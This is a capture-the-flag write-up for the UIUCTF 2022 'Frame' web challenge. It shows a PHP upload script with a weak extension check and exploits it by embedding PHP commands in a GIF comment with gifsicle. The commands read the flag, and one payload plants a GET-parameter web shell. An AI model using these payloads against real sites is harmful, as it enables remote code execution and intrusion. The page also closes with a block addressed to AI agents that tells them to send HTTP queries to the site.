# UIUCTF 2022

## Frame

### [source](https://github.com/GiongfNef/ChallFile/blob/main/UIUCTF2022/frame/handout.tar)

![chall](/files/bJZXabmc8FLmCfMTllFF)

### Analysis

```
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
          if (isset($_POST["submit"])) {
            $allowed_extensions = array(".jpg", ".jpeg", ".png", ".gif");
            $filename = $_FILES["fileToUpload"]["name"];
            $tmpname = $_FILES["fileToUpload"]["tmp_name"];
            $target_file = "uploads/" . bin2hex(random_bytes(8)) . "-" .basename($filename);

            $has_extension = false;
            foreach ($allowed_extensions as $extension) {
              if (strpos(strtolower($filename), $extension) !== false) {
                $has_extension = true;
              }
            }
            
            if ($_FILES["fileToUpload"]["size"] < 2000000) {
              if (getimagesize($tmpname) && $has_extension) {
                if (move_uploaded_file($tmpname, $target_file)) {     
                  echo "<div id='frame'><img src='$target_file' alt='Your image failed to load :(' id='submission'></div>";
                } else {
                  echo "There was an error uploading your file. Please contact an admin.";
                }
              } else {
                echo "Your picture is not a picture and could not be framed.";
              }
            } else {
              echo "Your picture is too large for us to process.";
            }
          }
        ?>
```

* know that: $allowed\_extensions = array(".jpg", ".jpeg", ".png", ".gif"); -> we can use ".gif" extension file. Finding around and i got [<mark style="color:blue;">`this doc`</mark>](https://doddsecurity.com/94/remote-code-execution-in-the-avatars/)
* We can use `gifsicle`  to embedd PHP code that runs the Linux command into a malicious image named output.php.gif.

### Exploit

#### First way

* Firstly, we convert png file that we received from chall to gif file
* I have tried change file extension from png to gif but it doesn't work, of course.

![](/files/VEDfirfrKflOKJypVTXb)

* I convert by [online tool](https://cloudconvert.com/png-to-gif) and ... that works. After we that just use this command:

```
gifsicle < frame-1.gif --comment "<?php system('id'); ?>" > output.php.gif
```

* Upload the output gif to server:

![the path of our requesting](/files/qLph441SRcwb546K1dsF)

Go to that path and get some interesting things:

![](/files/0NV0znj5Satw30dGF8lu)

* It works, try other commands to rce :

```
gifsicle < frame-1.gif --comment "<?php system('ls /'); ?>" > output.php.gif
```

![Here yah gooooo](/files/5eor1xzQfXHvMn0m0mUG)

* Now just use rce command and got the flag:

```
gifsicle < frame-1.gif --comment "<?php system('cd / && cat flag'); ?>" > output.php.gif
```

![](/files/eAZMdieb0x7KIbZyCyPP)

flag in some confusing thing like this:

![](/files/372epmXfQZAS9koYAuGE)

#### Firstway but easier \~

```
gifsicle < frame-1.gif --comment '<?php echo system($_GET["command"]); ?>' > output.php.gif
```

Now we can rce ez by web shell

> /uploads/c654036b5974c786-output.php.gif?command=ls%20-a

![](/files/v23oUZXkckKC6qqJQptx)

Thanks for reading. Have a good day :heart: !


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://giongfnef.gitbook.io/giongfnef/writeup-ctf/web/uiuctf-2022.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.